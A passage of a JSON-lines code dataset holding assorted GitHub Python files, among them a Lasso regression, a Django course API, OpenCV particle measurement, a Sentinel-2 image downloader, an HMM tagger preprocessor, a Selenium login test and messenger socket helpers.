values[i]\n else:\n res[begin - (i + 1) // 2] = values[i]\n return res\n\nif __name__ == \"__main__\":\n print(pendulum([4,6,7,5]))","repo_name":"MaximSinyaev/CodeWars","sub_path":"c7kyu/the-poet-and-the-pendulum.py","file_name":"the-poet-and-the-pendulum.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"33078847788","text":"import numpy as np\n\n\ndef soft_threshold(x, threshold):\n if x > threshold:\n return 1.\n elif x < - threshold:\n return -1.\n else:\n return 0.\n\n\nclass Lasso(object):\n\n def __init__(self, regularization=1., rho=1.):\n self.regularization = regularization\n self.rho = rho\n\n self.fitted = False\n self.weights = None\n\n def train(self, X, y, n_iterations=10):\n assert len(X.shape) == 2\n assert len(y.shape) <= 2\n\n n_samples = X.shape[0]\n 
n_features = X.shape[1] + 1\n ones = np.ones((n_samples, 1))\n X_tilde = np.append(ones, X, axis=1)\n\n a = np.random.normal(size=(n_features, 1))\n b = np.random.normal(size=(n_features, 1))\n\n inv = (np.dot(X_tilde.T, X_tilde) +\n self.rho * np.identity(n_features))\n\n inv = np.linalg.inv(inv)\n\n for _ in range(n_iterations):\n\n x = np.dot(inv, (np.dot(X_tilde.T, y.reshape(n_samples, -1)) +\n self.rho * a - b))\n\n a = (x + b / self.rho)\n a = np.apply_along_axis(\n lambda v: soft_threshold(v, self.regularization / self.rho),\n 1, a\n ).reshape(b.shape)\n\n b += self.rho * (x - a)\n\n weights = np.dot(inv, (np.dot(X_tilde.T, y.reshape(n_samples, -1)) +\n self.rho * a - b))\n\n self.weights = weights\n self.fitted = True\n\n def predict(self, X):\n assert self.fitted\n\n n_samples = X.shape[0]\n ones = np.ones((n_samples, 1))\n X_tilde = np.append(ones, X, axis=1)\n\n prevision = np.dot(X_tilde, self.weights)\n\n return prevision.reshape(-1)\n","repo_name":"HichamEB/ml_algorithms","sub_path":"linear_models/lasso_regression/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"31651601119","text":"from sentence_transformers import SentenceTransformer, util\nfrom pymongo import MongoClient\nimport time\nimport torch\ntorch.cuda.set_device(0)\n\nmodel_sentence_transformers = SentenceTransformer('./model/labse_bert_model')\n\nMONGO_CONNECTION_STRING = \"mongodb://localhost:27017/\"\nmongo_client = MongoClient(MONGO_CONNECTION_STRING)\n\ndb_data_pool = mongo_client['mlops']\n\n\ndef score_sentences(sentences_src, sentences_tgt):\n\n embeddings_src = model_sentence_transformers.encode(\n sentences_src, show_progress_bar=False, convert_to_numpy=True, normalize_embeddings=True)\n\n embeddings_tgt = model_sentence_transformers.encode(\n sentences_tgt, show_progress_bar=False, convert_to_numpy=True, normalize_embeddings=True)\n\n cosine_scores = util.dot_score(embeddings_src, embeddings_tgt)\n\n return cosine_scores\n\n\ndef clean_with_score(collection):\n\n sentences_src = []\n sentences_tgt = []\n ids = []\n\n results = db_data_pool[collection].find({'LaBSE': {'$exists': False}})\n\n for i, result in enumerate(results):\n sentences_src.append(result['sentence_src'])\n sentences_tgt.append(result['sentence_tgt'])\n ids.append(result['_id'])\n\n if (i+1) % 50000 == 0:\n cosine_scores = score_sentences(sentences_src, sentences_tgt)\n assert len(ids) == len(sentences_src) == len(\n sentences_tgt) == len(cosine_scores)\n for k in range(len(ids)):\n db_data_pool[collection].update_one({'_id': ids[k]},\n {'$set': {'LaBSE': round(float(cosine_scores[k][k]), 4)}})\n sentences_src.clear()\n sentences_tgt.clear()\n ids.clear()\n print(k, flush=True)\n print(i, flush=True)\n\n cosine_scores = score_sentences(sentences_src, sentences_tgt)\n assert len(ids) == len(sentences_src) == len(\n sentences_tgt) == len(cosine_scores)\n for k in range(len(ids)):\n db_data_pool[collection].update_one({'_id': ids[k]},\n {'$set': {'LaBSE': round(float(cosine_scores[k][k]), 4)}})\n sentences_src.clear()\n sentences_tgt.clear()\n ids.clear()\n print(k, flush=True)\n print(i, flush=True)\n\n\ndef main(collection=\"en||ms\"):\n\n start_time = time.time()\n\n clean_with_score(collection)\n print(\"finished {}\".format(collection), flush=True)\n\n \n print(\"--- {} seconds ---\".format(time.time() - start_time), flush=True)\n\n\nif __name__ == '__main__':\n import plac\n 
plac.call(main)\n","repo_name":"zouxunlong/cleaning","sub_path":"labse_scoring.py","file_name":"labse_scoring.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"27996980494","text":"import json\n\n\nfrom django.core import serializers\nfrom django.http import HttpResponse, JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views.generic import TemplateView\nfrom django import forms\nfrom .forms import NameForm,DescriptionForm, CustomNameForm, CustomDescriptionForm\n\nfrom .Utils import BodyData, ModelToJson\nfrom .models import Courses as CoursesModel\n\n\ndef FetchCourses():\n    return list(CoursesModel.objects.values())\n\n\nclass Courses(TemplateView, forms.Form):\n\n    def get(self, request, *args, **kwargs):\n        courses = FetchCourses()\n        if len(courses):\n            return JsonResponse({'courses': courses}, status=200)\n        else:\n            return HttpResponse('Zero courses', status=204)\n\n    @csrf_exempt\n    def post(self, request, *args, **kwargs):\n\n        content = BodyData(request)\n\n        if content is None:\n            return HttpResponse('You can\\'t create course without name and description', status=204)\n\n\n        name = content['name']\n        description = content['description']\n        c = CoursesModel(name=name, description=description)\n        c.save()\n\n        return JsonResponse(ModelToJson(c), status=201)\n    \n\nclass Course(TemplateView):\n\n    def get(self, request, *args, **kwargs):\n\n        fetchedCourse = CoursesModel.objects.filter(id=kwargs['course_id']).values()\n\n        if not fetchedCourse:\n            return HttpResponse('Course is Not found', status=404)\n        else:\n            return JsonResponse(data=fetchedCourse[0], status=200)\n\n    @csrf_exempt\n    def put(self, request, *args, **kwargs):\n\n\n        fetchedCourse = CoursesModel.objects.filter(id=kwargs['course_id'])[0]\n        content = BodyData(request)\n\n        if not fetchedCourse:\n            return HttpResponse('Course is Not found', status=404)\n        elif content is None:\n            return HttpResponse('You can\\'t Update course without name and description', status=204)\n        else:\n            name = content['name']\n            description = content['description']\n\n            fetchedCourse.name = name\n            fetchedCourse.description = description\n            fetchedCourse.save()\n            return JsonResponse(ModelToJson(fetchedCourse),status=201)\n\n    @csrf_exempt\n    def delete(self, request, *args, **kwargs):\n        fetchedCourse = CoursesModel.objects.filter(id=kwargs['course_id'])[0]\n\n        if not fetchedCourse:\n            return HttpResponse('Course is Not found', status=404)\n        else:\n            fetchedCourse.delete()\n            return HttpResponse('Course {} deleted'.format(kwargs['course_id']), status=200)\n","repo_name":"ssary/bld_Django_1","sub_path":"server/server/courses/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"27357965611","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Mar  5 14:09:39 2021\r\n\r\n@author: 20183245\r\n\"\"\"\r\n# import the necessary packages\r\nimport numpy as np\r\nimport cv2\r\nfrom PIL import Image\r\nfrom sympy import *\r\nfrom sympy.geometry import *\r\n\r\nimage = cv2.imread('images/test.tiff')\r\nlbound=475 #x coord of the section\r\nrbound=550 #x coord of the section\r\nimageright=image[:,lbound:]\r\noutputright = imageright.copy()\r\noutput= image.copy()\r\nimageleft=image[:,:rbound]\r\noutputleft = imageleft.copy()\r\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\r\n\r\n#Canny edges\r\nedges1 = cv2.Canny(gray,6000,6000,apertureSize = 7)\r\nedgesright=edges1[:,lbound:]\r\nedges2 = cv2.Canny(gray,9000,9000,apertureSize = 7)\r\nedgesleft=edges2[:,:rbound]\r\n\r\n# Find right circle\r\ncirclesright = cv2.HoughCircles(edgesright, cv2.HOUGH_GRADIENT,1,8, param1=100,param2=49,minRadius=20,maxRadius=75) #cv2.HoughCircles(edges, cv2.HOUGH_GRADIENT,1,8, param1=63,param2=26,minRadius=20,maxRadius=75)\r\n# ensure at least some circles were found\r\nif circlesright is not None:\r\n\t# convert the (x, y) coordinates and radius of the circles to integers\r\n\tcirclesright = np.round(circlesright[0, :]).astype(\"int\")\r\n\t# loop over the (x, y) coordinates and radius of the circles\r\n\tfor (xr, yr, rr) in circlesright:\r\n\t\t# draw the circle in the output image, then draw a rectangle\r\n\t\t# corresponding to the center of the circle\r\n\t\tcv2.circle(outputright, (xr, yr), rr, (0, 255, 0), 1)\r\n\t\tcv2.rectangle(outputright, (xr - 2, yr - 2), (xr + 2, yr + 2), (0, 128, 255), -1)\r\ncright=Circle(Point(xr+lbound,yr),rr) #right side of the particle\r\n\r\n#Find left circle\r\ncirclesleft = cv2.HoughCircles(edgesleft, cv2.HOUGH_GRADIENT,1,8, param1=600,param2=36,minRadius=20,maxRadius=75) #cv2.HoughCircles(edges, cv2.HOUGH_GRADIENT,1,8, param1=63,param2=26,minRadius=20,maxRadius=75)\r\n# ensure at least some circles were found\r\nif circlesleft is not None:\r\n\t# convert the (x, y) coordinates and radius of the circles to integers\r\n\tcirclesleft = np.round(circlesleft[0, :]).astype(\"int\")\r\n\t# loop over the (x, y) coordinates and radius of the circles\r\n\tfor (xl, yl, rl) in circlesleft:\r\n\t\t# draw the circle in the output image, then draw a rectangle\r\n\t\t# corresponding to the center of the circle\r\n\t\tcv2.circle(outputleft, (xl, yl), rl, (0, 255, 0), 1)\r\n\t\tcv2.rectangle(outputleft, (xl - 2, yl - 2), (xl + 2, yl + 2), (0, 128, 255), -1)\r\n        \r\n        \r\ncleft=Circle(Point(xl,yl),rl) #left side of the particle\r\n\r\n# Find the walls\r\nedges3 = cv2.Canny(gray,60,60,apertureSize = 3) #ap=3 works best\r\nlines = cv2.HoughLinesP(edges3,1,np.pi/180,292,minLineLength=350,maxLineGap=300) \r\ncv2.line(outputleft, (lines[2,0,0],lines[2,0,1]), (lines[2,0,2],lines[2,0,3]), (0,255,0), 1) #check which lines are the correct ones\r\ncv2.line(outputleft, (lines[3,0,0],lines[3,0,1]), (lines[3,0,2],lines[3,0,3]), (0,255,0), 1)\r\ncv2.line(outputright, (lines[2,0,0],lines[2,0,1]), (lines[2,0,2],lines[2,0,3]), (0,255,0), 1)\r\ncv2.line(outputright, (lines[3,0,0],lines[3,0,1]), (lines[3,0,2],lines[3,0,3]), (0,255,0), 1)\r\n#cv2.line(output, (lines[2,0,0],lines[2,0,1]), (lines[2,0,2],lines[2,0,3]), (0,255,0), 1)\r\n#cv2.line(output, (lines[3,0,0],lines[3,0,1]), (lines[3,0,2],lines[3,0,3]), (0,255,0), 1)\r\n\r\n# Defining the correct lines as capillary walls\r\ntopwall=Line(Point(lines[2,0,0],lines[2,0,1]),Point(lines[2,0,2],lines[2,0,3]))\r\nbottomwall=Line(Point(lines[3,0,0],lines[3,0,1]),Point(lines[3,0,2],lines[3,0,3]))\r\n# Calculating all intersection points\r\n[S1a,S1b]=intersection(topwall,cleft) #first one is correct\r\n[S2a,S2b]=intersection(topwall,cright) #second one is correct \r\n[S3a,S3b]=intersection(bottomwall,cleft) #first one is correct\r\n[S4a,S4b]=intersection(bottomwall,cright) #second one is correct\r\n#Lbands\r\nLbandtop=float(sqrt((S1a[0]-S2b[0])**2+(S1a[1]-S2b[1])**2))\r\nLbandbottom=float(sqrt((S3a[0]-S4b[0])**2+(S3a[1]-S4b[1])**2))\r\nLband=int((Lbandtop+Lbandbottom)/2) #average of top and bottom contact length\r\ncv2.line(output, (int(S1a[0]),int(S1a[1])), (int(S2b[0]),int(S2b[1])),(0,255,0),1) #draw top lband\r\ncv2.line(output, (int(S3a[0]),int(S3a[1])), (int(S4b[0]),int(S4b[1])),(0,255,0),1) #draw bottom lband\r\n#cv2.line(output, (int((S1a[0]+S2b[0])*0.5),int((S1a[1]+S2b[1])*0.5)), (int((S3a[0]+S4b[0])*0.5),int((S3a[1]+S4b[1])*0.5)),(0,255,0),1) #line trhough middle of the lbands\r\n## Calculating points for spherical cap\r\nXmidright=int(0.5*S2b[0]+0.5*S4b[0]) #Xcoord of the right point on the middle horizontal line through the particle\r\nYmidright=int(0.5*S2b[1]+0.5*S4b[1])\r\nXmidleft=int(0.5*S1a[0]+0.5*S3a[0]) #Xcoord of the left point on the middle horizontal line though the particle\r\nYmidleft=int(0.5*S1a[1]+0.5*S3a[1])\r\n# Create points from the x/y coords calculated above\r\np_midright=[Xmidright,Ymidright] #Midpoint between wall intersections with right circle\r\np_midleft=[Xmidleft,Ymidleft] #Midpoint between wall intersections with left circle\r\nslope=(Ymidright-Ymidleft)/(Xmidright-Xmidleft) #slope of the midline, used to extend the midline line in the next part\r\n# =============================================================================\r\n# #Extended midline\r\ncv2.line(output,(int(Xmidleft)-100,int(Ymidleft-100*slope)),(int(Xmidright)+100,int(Ymidright+100*slope)),(0,255,0),1) #draw extended midline in output\r\n# cv2.circle(output, (xl, yl), rl, (0, 255, 0), 1) #draw left circle in output image\r\n# cv2.circle(output, (xr+lbound, yr), rr, (255, 0, 0), 1) #draw right circle in output image\r\n# =============================================================================\r\ncv2.line(output,(int(S1a[0]),int(S1a[1])),(int(S3a[0]),int(S3a[1])),(0,255,0),1) #draw the rbands\r\ncv2.line(output,(int(S2b[0]),int(S2b[1])),(int(S4b[0]),int(S4b[1])),(0,255,0),1) #draw the rbands\r\nmidline=Line(Point(Xmidleft-100,Ymidleft),Point(Xmidright+100,Ymidright)) #define the midline for sympy\r\n# rband\r\nrright1=float(midline.distance(S2b)) # top part of right rband\r\nrright2=float(midline.distance(S4b)) # bottom part of right rband\r\nrleft1=float(midline.distance(S1a)) # top part of left rband\r\nrleft2=float(midline.distance(S3a)) # bottom part of left rband\r\nRband=int(((rright1+rright2)/2+((rleft1+rleft2)/2))/2) #average of all 4 rbands\r\n# Point for calculating volume\r\n[Smidleft1,Smidright1]=intersection(cleft,midline) #intersections between midline and left side of particle\r\np_h1=[int(Smidleft1[0]),int(Smidleft1[1])] # most left intersection point\r\nh1=float(sqrt((Xmidleft-p_h1[0])**2+(Ymidleft-p_h1[1])**2)) #h1 parameter for spherical cap\r\n[Smidleft2,Smidright2]=intersection(cright,midline) #intersections between midline and right side of particle\r\np_h2=[int(Smidright2[0]),int(Smidright2[1])] # most right intersection point\r\nh2=float(sqrt((Xmidright-p_h2[0])**2+(Ymidright-p_h2[1])**2)) #h2 parameter for spherical cap\r\n# Volume sperical cap\r\nV_sc1=(np.pi*h1**2)/3*(3*rl-h1)\r\nV_sc2=(np.pi*h2**2)/3*(3*rr-h2)\r\n## Calculating volume of fustrum\r\nh3=Xmidright-Xmidleft\r\nr1=(rright1+rright2)/2\r\nr2=(rleft1+rleft2)/2\r\nV_cf=np.pi*h3/3*(r1**2+r1*r2+r2**2)\r\n#final volume\r\nV_Particle=int(V_sc1+V_cf+V_sc2)\r\n\r\n## add text to image\r\nfont = cv2.FONT_HERSHEY_SIMPLEX\r\nbottomLeftCornerOfText = (10,400)\r\nfontScale = 1\r\nfontColor = (255,255,255)\r\nlineType = 2\r\n\r\ncv2.putText(output,'Lband='+\"{}\".format(Lband),\r\n    bottomLeftCornerOfText,\r\n    font, \r\n    fontScale,\r\n    fontColor,\r\n    lineType)\r\nbottomLeftCornerOfText = (10,430)\r\ncv2.putText(output,'Rband='+\"{}\".format(Rband),\r\n    
bottomLeftCornerOfText,\r\n font, \r\n fontScale,\r\n fontColor,\r\n lineType)\r\nbottomLeftCornerOfText = (10,460)\r\ncv2.putText(output,'Volume='+\"{}\".format(V_Particle),\r\n bottomLeftCornerOfText,\r\n font, \r\n fontScale,\r\n fontColor,\r\n lineType)\r\n# Checking figures\r\ncv2.imshow(\"output\", np.hstack([imageright, outputright])) # show right circle\r\ncv2.imshow(\"output\", np.hstack([imageleft, outputleft])) # show left circle\r\ncv2.imshow(\"output\", output) # show wall lines\r\n#cv2.imwrite('images/im_text.png', output ) # save image in images folder\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n","repo_name":"IvoHoffmanns/BEP_Ivo","sub_path":"calcLbRbVolume.py","file_name":"calcLbRbVolume.py","file_ext":"py","file_size_in_byte":8161,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"71250792154","text":"while True:\r\n L = list(map(int,input().split(\" \")))\r\n x = max(L)\r\n if x==0:\r\n break\r\n L.remove(x)\r\n if x**2 == L[0]**2 + L[1]**2:\r\n print(\"right\")\r\n else:\r\n print(\"wrong\")","repo_name":"IkbeomJo/Baekjoon","sub_path":"백준/Bronze/4153. 직각삼각형/직각삼각형.py","file_name":"직각삼각형.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"73867126874","text":"# %% [markdown]\n# This Notebook downloads data from PC in the format required by the inference notebook.\n#\n\n# %%\nimport requests\nimport planetary_computer\nimport pystac_client\nimport geopandas as gpd\nfrom pathlib import Path\nimport numpy as np\nimport requests\nimport json\nfrom datetime import datetime\nimport shapely\nimport pandas as pd\nimport rasterio as rio\nfrom tqdm.auto import tqdm\nfrom concurrent.futures import ThreadPoolExecutor\n\n\n# %%\ndef add_cloud_pct(items_df):\n items_df[\"cloud_pct\"] = items_df.apply(\n lambda row: row[0].properties[\"eo:cloud_cover\"], axis=1\n )\n return items_df\n\n\n# %%\n# add_cloud_pct(items_df)\n\n\n# %%\n# use the world tide api to get the tide height at the time of the image\ndef add_tide_height(centroid, items_df, world_tides_api_key):\n results = []\n lon, lat = centroid.coords[0]\n for id, item in items_df.iterrows():\n dt_str = item[0].to_dict()[\"properties\"][\"datetime\"]\n\n dt_obj = datetime.fromisoformat(dt_str.replace(\"Z\", \"+00:00\"))\n\n # Fetch data from API\n url = f\"https://www.worldtides.info/api/v3?heights&date={dt_obj.date().isoformat()}&lat={lat}&lon={lon}&key={world_tides_api_key}\"\n response = requests.get(url)\n data = json.loads(response.text)\n\n min_diff = float(\"inf\")\n closest_entry = {}\n target_timestamp = dt_obj.timestamp()\n for entry in data[\"heights\"]:\n diff = abs(entry[\"dt\"] - target_timestamp)\n if diff < min_diff:\n min_diff = diff\n closest_entry = entry\n\n results.append(closest_entry[\"height\"])\n\n items_df[\"tide_height\"] = results\n\n return items_df\n\n\ndef get_band(href, attempt=0):\n try:\n singed_href = planetary_computer.sign(href)\n with rio.open(singed_href) as src:\n return src.read(1), src.profile.copy()\n except:\n print(f\"Failed to open {href}\")\n if attempt < 3:\n print(f\"Trying again {attempt+1}\")\n return get_band(href, attempt + 1)\n else:\n print(f\"Failed to open {href} after 3 attempts\")\n return None, None\n\n\ndef downlaod_bands(items_with_tide, time_steps, required_bands):\n bands = []\n profile = {}\n pbar = tqdm(total=time_steps * len(required_bands), leave=False)\n for id, row in items_with_tide.iterrows():\n 
scene_bands = []\n\n        for band in required_bands:\n            href = row[\"item\"].assets[band].href\n            band, profile = get_band(href)\n            if band is None:\n                print(f\"Failed to download {href}\")\n                scene_bands = []\n                break\n            pbar.update(1)\n\n            scene_bands.append(band)\n        for band in scene_bands:\n            bands.append(band)\n        if len(bands) == time_steps * len(required_bands):\n            return bands, profile\n    return bands, profile\n\n\ndef split_by_orbits(items):\n    orbits = {}\n    for item in items:\n        orbit = item.properties[\"sat:relative_orbit\"]\n        if orbit not in orbits:\n            orbits[orbit] = [item]\n        else:\n            orbits[orbit].append(item)\n    return orbits\n\n\ndef export_tif(bands, profile, export_path):\n    array = np.array(bands)\n    profile.update(count=array.shape[0])\n    with rio.open(export_path, \"w\", **profile) as dst:\n        dst.write(array)\n\n\ndef download_scene(\n    row,\n    target_bands,\n    time_steps,\n    extract_start_year,\n    extract_end_year,\n    export_dir,\n    required_bands,\n    world_tides_api_key,\n):\n    _, row = row\n    centroid = row.geometry.centroid\n    export_path = export_dir / f\"{row.Name}_{extract_start_year}_{extract_end_year}.tif\"\n    print(export_path)\n\n    if export_path.exists():\n        print(f\"File exists for {row.Name}\")\n        return\n\n    # Sentinel-2 query parameters\n    query = {\n        \"collections\": [\"sentinel-2-l2a\"],\n        \"intersects\": shapely.to_geojson(centroid),  # type: ignore\n        \"datetime\": f\"{extract_start_year}-01-01T00:00:00Z/{extract_end_year}-12-31T23:59:59Z\",\n        \"query\": {\"s2:mgrs_tile\": {\"eq\": row.Name}},\n    }\n    catalog = pystac_client.Client.open(\n        \"https://planetarycomputer.microsoft.com/api/stac/v1\",\n    )\n    scenes = catalog.search(**query).get_all_items()\n    # break\n    if len(scenes) == 0:\n        return\n\n    scenes_by_orbit = split_by_orbits(scenes)\n    all_orbits_bands = []\n    profile = {}\n    for orbit, scenes in scenes_by_orbit.items():\n        # make df from items in orbit\n        items_df = pd.DataFrame(scenes)\n        items_df.columns = [\"item\"]\n\n        items_df = add_cloud_pct(items_df)\n        # sort by cloud cover\n        items_df = items_df.sort_values(by=\"cloud_pct\", ascending=True)\n        # only keep the top 20 scenes\n        items_df = items_df[:20]\n        items_df = add_tide_height(centroid, items_df, world_tides_api_key)\n        # round cloud percentage to the nearest 10\n        items_df[\"cloud_pct\"] = items_df[\"cloud_pct\"].apply(\n            lambda x: round(x / 10) * 10\n        )\n        # Sort by cloud_pct and then by tide_height\n        items_df = items_df.sort_values(\n            by=[\"cloud_pct\", \"tide_height\"], ascending=[True, False]\n        )\n        # download the required bands\n        bands, profile = downlaod_bands(items_df, time_steps, required_bands)\n        all_orbits_bands.append(bands)\n\n    all_orbits_bands = np.array(all_orbits_bands)\n    all_orbits_bands = np.moveaxis(all_orbits_bands, 0, 1)\n\n    merged_bands = []\n    for multi_orbit_bands in all_orbits_bands:\n        target_array = np.zeros(multi_orbit_bands.shape[1:])\n        for band in multi_orbit_bands:\n            target_array[target_array == 0] = band[target_array == 0]\n        merged_bands.append(target_array)\n    # merged_bands = np.array(merged_bands)\n\n    if len(merged_bands) == target_bands:\n        export_tif(merged_bands, profile, export_path)\n    else:\n        print(f\"Failed to download {row.Name}\")\n    return export_path\n    # break\n\n\ndef download_row(row, tide_key_path, export_dir):\n    world_tides_api_key = tide_key_path.read_text().strip()\n\n    # %%\n    # this is the output dir; each scene will end up about 2Gb, so make sure you have space!\n    export_dir.mkdir(exist_ok=True, parents=True)\n\n    # %%\n    required_bands = [\"B03\", \"B08\"]\n    target_bands = 12\n    time_steps = 6\n 
extract_start_year = 2022\n    extract_end_year = 2022\n\n    # %%\n\n    # %%\n    # call download_scene with a thread pool\n    # download_scene(s2_grid.iloc[0], target_bands, time_steps, extract_start_year, extract_end_year, export_dir)\n    export_path = download_scene(\n        row,\n        target_bands,\n        time_steps,\n        extract_start_year,\n        extract_end_year,\n        export_dir,\n        required_bands,\n        world_tides_api_key,\n    )\n    return export_path\n    # %%\n","repo_name":"wrignj08/S2Coastline","sub_path":"helpers/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":6804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
{"seq_id":"23654720702","text":"import numpy as np \nimport string \nfrom utils import *\n\n\n# Punctuation characters\npunct = set(string.punctuation)\n\n\ndef load_test_corpus(corpus_url):\n    \"\"\"\n    Split test corpus\n    Input: test_corpus url\n    Output:\n    - test_words: List of all words in test_corpus\n    - y: List of tags corresponding to each word in test_words\n    \"\"\"\n    test_words = []\n    y = []\n    with open(corpus_url, 'r') as f:\n        load = f.readlines()\n    for item in load:\n        word_tag = item.split()\n        if len(word_tag) != 2:\n            word = \"--n--\"\n            tag = \"--s--\"\n        else:\n            word = word_tag[0]\n            tag = word_tag[1]\n        test_words.append(word)\n        y.append(tag)\n    return test_words, y\n\n\ndef preprocess_list(vocab, test_words_list):\n    \"\"\"\n    Preprocess out-of-vocabulary words (use when no test_corpus .words file is available)\n    Input:\n    - Vocab: Dict {word: index}\n    - test_word_list: test_words list extracted by calling 'load_test_corpus(corpus_url)' \n    \"\"\"\n    origin = []\n    processed = []\n    for word in test_words_list:\n        if not word:\n            origin.append(word.strip())\n            word = \"--n--\"\n            processed.append(word)\n            continue\n        elif word.strip() not in vocab:\n            origin.append(word.strip())\n            word = assign_unk(word)\n            processed.append(word)\n            continue\n        else:\n            origin.append(word.strip())\n            processed.append(word.strip())\n    return origin, processed\n\n\ndef preprocess_words(vocab, test_words_file):\n    \"\"\"\n    Preprocess out-of-vocabulary words using a .words file\n    Input:\n    - Vocab: Dict {word: index}\n    - test_word_file: test_corpus .words file\n    \"\"\"\n    origin = []\n    processed = []\n    print(len(vocab))\n    with open(test_words_file, \"r\") as data_file:\n        for _, word in enumerate(data_file):\n            # End of sentence\n            if not word.split():\n                origin.append(word.strip())\n                word = \"--n--\"\n                processed.append(word)\n                continue\n\n            # Handle unknown words\n            elif word.strip() not in vocab:\n                origin.append(word.strip())\n                word = assign_unk(word)\n                processed.append(word)\n                continue\n\n            else:\n                origin.append(word.strip())\n                processed.append(word.strip())\n    return origin, processed\n\n\nif __name__ == \"__main__\":\n    words, label = load_test_corpus(\"./data/WSJ_24.pos\")\n    print(\"First 50 words in test corpus: \", words[:50])\n    print(\"First 50 tags in test corpus: \", label[:50])\n    vocab_txt=\"./data/hmm_vocab.txt\"\n    vocab = get_index_vocab(vocab_txt=vocab_txt)\n    _, test_words = preprocess_list(vocab=vocab, test_words_list=words) \n    print(\"First 50 words in test corpus after processing: \", test_words[:30])\n\n","repo_name":"LTPhat/HMM-Viterbi-POS-Tagger","sub_path":"process_test_corpus.py","file_name":"process_test_corpus.py","file_ext":"py","file_size_in_byte":2914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
{"seq_id":"1244457051","text":"from django.conf.urls import patterns, url\nfrom gjsv import 
views\n\nurlpatterns = patterns('',\n    url(r'^$', views.index, name='index'),\n    url(r'^fetch/(?P.+)/$' ,views.fetch, name='fetch'),\n    url(r'^update/(?P.+)/$' ,views.update, name='update'),\n    url(r'^editor/$',views.editor, name='editor'),\n    \n)\n","repo_name":"monomoti/Leaflet_HandsOn","sub_path":"application/thesite/gjsv/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"}
{"seq_id":"34575900037","text":"from test_project.common.singdriver import SingleDriver\ndriver=SingleDriver()\nfrom test_project.business.user import UserAction\nuseraction=UserAction()\n\ndef test_login():\n    useraction.user_login('testuser1','123456')\n    # add assertions\n    # 1: a successful login should redirect to the home page\n    current_url=driver.current_url\n    assert current_url=='http://49.233.108.117:3000/','should redirect to the home page'\n\n    # 2: the username should be testuser1\n    username=driver.find_element_by_css_selector('span[class=\"user_name\"]>a[class=\"dark\"]').text\n    assert username=='testuser1','the logged-in username should be testuser1'\n\n\n\ndef test_register():\n    '''\n    Test the registration feature\n    :return:\n    '''\n    useraction.user_register('testuser2','123456','123456','123456@qq.com')\n\n    current_url=driver.current_url\n    assert current_url=='http://49.233.108.117:3000/signup','should redirect to the registration page'","repo_name":"jack-fjh/pytest_demo","sub_path":"test_project/testcase/test_user.py","file_name":"test_user.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
{"seq_id":"18879443495","text":"\"\"\"\nGeek University Python development\n\nMessenger\nShared components\n\nStudy project for the course \"Client-server applications in Python\".\n\nAuthor: Mikhail Dukhonin\n\nOctober - November 2021\n\n \"\"\"\n\nimport sys\nfrom logging import getLogger\nfrom json import dumps, loads\nfrom common.variables import ENCODING, MAX_SIZE_PACKAGE\nfrom common.decorators import log_func\n\nsys.path.append('..')\n\nimport log_configs.client_log_config\nimport log_configs.server_log_config\n\nif sys.argv[0].find('server') != -1:\n    log = getLogger('server')\nelif sys.argv[0].find('client') != -1:\n    log = getLogger('client')\nelse:\n    print('logger not found')\n\n@log_func(log)\ndef connect_data (args):\n    \"\"\" Takes a list of three elements (the command line)\n    and returns a tuple of its second and third elements.\n    These hold the connection/listening data for the client/server (address and port).\n\n \"\"\"\n\n    if args and len(args) == 3:\n        return (args[1], int(args[2]))\n\n# To be honest, I am frankly too lazy to bother with parsing the command line.\n# If a proper interface is ever really needed, I would rather spend the effort on argparse.\n\n@log_func(log)\ndef get_msg(sock):\n    \"\"\" Receives a message from the socket \"\"\"\n\n    msg = sock.recv(MAX_SIZE_PACKAGE)\n\n    try:\n        msg = msg.decode(ENCODING)\n    except UnicodeDecodeError:\n        raise ValueError('Not utf-8') from UnicodeDecodeError\n\n    if len(msg) != 0:\n        msg = loads(msg)\n    else:\n        print(\"Empty string\")\n        return {}\n\n    if isinstance(msg, dict):\n        return msg\n    else:\n        raise TypeError('not a dictionary')\n\n\n@log_func(log)\ndef send_msg(sock, msg):\n    \"\"\" Sends the message msg to the server socket sock. 
